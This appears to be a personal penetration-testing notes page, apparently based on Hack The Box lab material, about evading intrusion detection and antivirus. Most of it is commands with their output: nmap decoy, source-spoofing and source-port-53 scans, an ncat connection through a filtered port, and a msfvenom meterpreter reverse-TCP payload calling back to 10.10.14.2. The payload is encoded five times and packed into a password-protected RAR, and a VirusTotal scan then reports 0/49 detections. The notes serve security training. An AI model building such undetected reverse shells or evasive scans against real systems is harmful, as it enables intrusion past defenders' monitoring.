IDS IPS AV Evasion
Connect
The Connect scan is useful because it is the most accurate way to determine the state of a port, and it is also the most stealthy. Unlike other types of scans, such as the SYN scan, the Connect scan does not leave any unfinished connections or unsent packets on the target host, which makes it less likely to be detected by intrusion detection systems (IDS) or intrusion prevention systems (IPS)
sudo nmap 10.129.2.28 -p 443 --packet-trace --disable-arp-ping -Pn -n --reason -sT Decoy
With the Decoy scanning method (-D), Nmap generates various random IP addresses inserted into the IP header to disguise the origin of the packet sent. == prevent IPS to block our IP address
sudo nmap 10.129.2.28 -p 80 -sS -Pn -n --disable-arp-ping --packet-trace -D RND:5Specify the source IP address (-S)
-S)When only individual subnets would not have access to the server's specific services
nmap 10.129.2.28 -n -Pn -p 445 -O -S 10.129.2.200 -e tun0
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-22 01:16 CEST
Nmap scan report for 10.129.2.28
Host is up (0.010s latency).
PORT STATE SERVICE
445/tcp open microsoft-dsDNS proxying
If we are in a demilitarized zone (DMZ), the company's DNS servers are usually more trusted than those from the Internet. So, for example, we could use them to interact with the hosts of the internal network.
################### FIRST SCAN ########################
nmap 10.129.2.28 -p50000 -sS -Pn -n --disable-arp-ping --packet-trace
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 22:50 CEST
SENT (0.0417s) TCP 10.10.14.2:33436 > 10.129.2.28:50000 S ttl=41 id=21939 iplen=44 seq=736533153 win=1024 <mss 1460>
SENT (1.0481s) TCP 10.10.14.2:33437 > 10.129.2.28:50000 S ttl=46 id=6446 iplen=44 seq=736598688 win=1024 <mss 1460>
Nmap scan report for 10.129.2.28
Host is up.
PORT STATE SERVICE
50000/tcp filtered ibm-db2
################### SECOND SCAN ########################
sudo nmap 10.129.2.28 -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53
SENT (0.0482s) TCP 10.10.14.2:53 > 10.129.2.28:50000 S ttl=58 id=27470 iplen=44 seq=4003923435 win=1024 <mss 1460>
RCVD (0.0608s) TCP 10.129.2.28:50000 > 10.10.14.2:53 SA ttl=64 id=0 iplen=44 seq=540635485 win=64240 <mss 1460>
Nmap scan report for 10.129.2.28
Host is up (0.013s latency).
PORT STATE SERVICE
50000/tcp open ibm-db2-n
Disables DNS resolution.
--source-port 53
Performs the scans from specified source port.
Connect to the filtered port
ncat -nv --source-port 53 10.129.2.28 50000
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Connected to 10.129.2.28:50000.
220 ProFTPd
Metasploit - Archiving two times
$ msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -e x86/shikata_ga_nai -a x86 --platform windows -o ~/test.js -i 5
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 27 (iteration=0)
x86/shikata_ga_nai succeeded with size 54 (iteration=1)
x86/shikata_ga_nai succeeded with size 81 (iteration=2)
x86/shikata_ga_nai succeeded with size 108 (iteration=3)
x86/shikata_ga_nai succeeded with size 135 (iteration=4)
x86/shikata_ga_nai chosen with final size 135
Payload size: 135 bytes
Saved as: /home/user/test.js$ wget https://www.rarlab.com/rar/rarlinux-x64-612.tar.gz
$ tar -xzvf rarlinux-x64-612.tar.gz && cd rar
$ rar a ~/test.rar -p ~/test.js$ mv test.rar test
0xss0rz@htb[/htb]$ ls
test test.js$ rar a test2.rar -p test
Enter password (will not be echoed): ******
Reenter password: ******
RAR 5.50 Copyright (c) 1993-2017 Alexander Roshal 11 Aug 2017
Trial version Type 'rar -?' for help
Evaluation copy. Please register.
Creating archive test2.rar
Adding test OK
Donemv test2.rar test2
0xss0rz@htb[/htb]$ ls
test test2 test.js$ msf-virustotal -k <API key> -f test2
[*] Using API key: <API key>
[*] Please wait while I upload test2...
[*] VirusTotal: Scan request successfully queued, come back later for the report
[*] Sample MD5 hash : 2f25eeeea28f737917e59177be61be6d
[*] Sample SHA1 hash : c31d7f02cfadd87c430c2eadf77f287db4701429
[*] Sample SHA256 hash : 76ec64197aa2ac203a5faa303db94f530802462e37b6e1128377315a93d1c2ad
[*] Analysis link: https://www.virustotal.com/gui/file/<SNIP>/detection/f-<SNIP>-1652167804
[*] Requesting the report...
[*] Received code 0. Waiting for another 60 seconds...
[*] Received code -2. Waiting for another 60 seconds...
[*] Received code -2. Waiting for another 60 seconds...
[*] Received code -2. Waiting for another 60 seconds...
[*] Received code -2. Waiting for another 60 seconds...
[*] Received code -2. Waiting for another 60 seconds...
[*] Analysis Report: test2 (0 / 49): 76ec64197aa2ac203a5faa303db94f530802462e37b6e1128377315a93d1c2ad
=================================================================================================
Antivirus Detected Version Result Update
--------- -------- ------- ------ ------
ALYac false 1.1.3.1 20220510
Acronis false 1.2.0.108 20220426
Ad-Aware false 3.0.21.193 20220510
AhnLab-V3 false 3.21.3.10230 20220510
Antiy-AVL false 3.0 20220510
Arcabit false 1.0.0.889 20220510
Avira false 8.3.3.14 20220510
BitDefender false 7.2 20220510
BitDefenderTheta false 7.2.37796.0 20220428
Bkav false 1.3.0.9899 20220509
CAT-QuickHeal false 14.00 20220510
CMC false 2.10.2019.1 20211026
ClamAV false 0.105.0.0 20220509
Comodo false 34606 20220509
Cynet false 4.0.0.27 20220510
Cyren false 6.5.1.2 20220510
DrWeb false 7.0.56.4040 20220510
ESET-NOD32 false 25243 20220510
Emsisoft false 2021.5.0.7597 20220510
F-Secure false 18.10.978.51 20220510
FireEye false 35.24.1.0 20220510
Fortinet false 6.2.142.0 20220510
Gridinsoft false 1.0.77.174 20220510
Jiangmin false 16.0.100 20220509
K7AntiVirus false 12.12.42275 20220510
K7GW false 12.12.42275 20220510
Kingsoft false 2017.9.26.565 20220510
Lionic false 7.5 20220510
MAX false 2019.9.16.1 20220510
Malwarebytes false 4.2.2.27 20220510
MaxSecure false 1.0.0.1 20220510
McAfee-GW-Edition false v2019.1.2+3728 20220510
MicroWorld-eScan false 14.0.409.0 20220510
NANO-Antivirus false 1.0.146.25588 20220510
Panda false 4.6.4.2 20220509
Rising false 25.0.0.27 20220510
SUPERAntiSpyware false 5.6.0.1032 20220507
Sangfor false 2.14.0.0 20220507
Symantec false 1.17.0.0 20220510
TACHYON false 2022-05-10.02 20220510
Tencent false 1.0.0.1 20220510
TrendMicro-HouseCall false 10.0.0.1040 20220510
VBA32 false 5.0.0 20220506
ViRobot false 2014.3.20.0 20220510
VirIT false 9.5.191 20220509
Yandex false 5.5.2.24 20220428
Zillya false 2.0.0.4627 20220509
ZoneAlarm false 1.0 20220510
Zoner false 2.2.2.0 20220509Packer
A list of popular packer software:
If we want to learn more about packers, please check out the PolyPack project.
Interesting Books
Interesting BooksNmap Network Scanning The official guide to the Nmap Security Scanner, a free and open source utility used by millions of people for network discovery, administration, and security auditing. From explaining port scanning basics for novices to detailing low-level packet crafting methods used by advanced hackers, this book by Nmap's original author suits all levels of security and networking professionals.
The Art of Network Penetration Testing A guide to simulating an internal security breach. You’ll take on the role of the attacker and work through every stage of a professional pentest, from information gathering to seizing control of a system and owning the network.
Network Basics for Hackers The book offers one of the most complete and in-depth analyses of Wi-Fi and Bluetooth networks, then progresses through the various protocols such as DNS, ARP, SMTP, and others.
Support this Gitbook
I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.
Last updated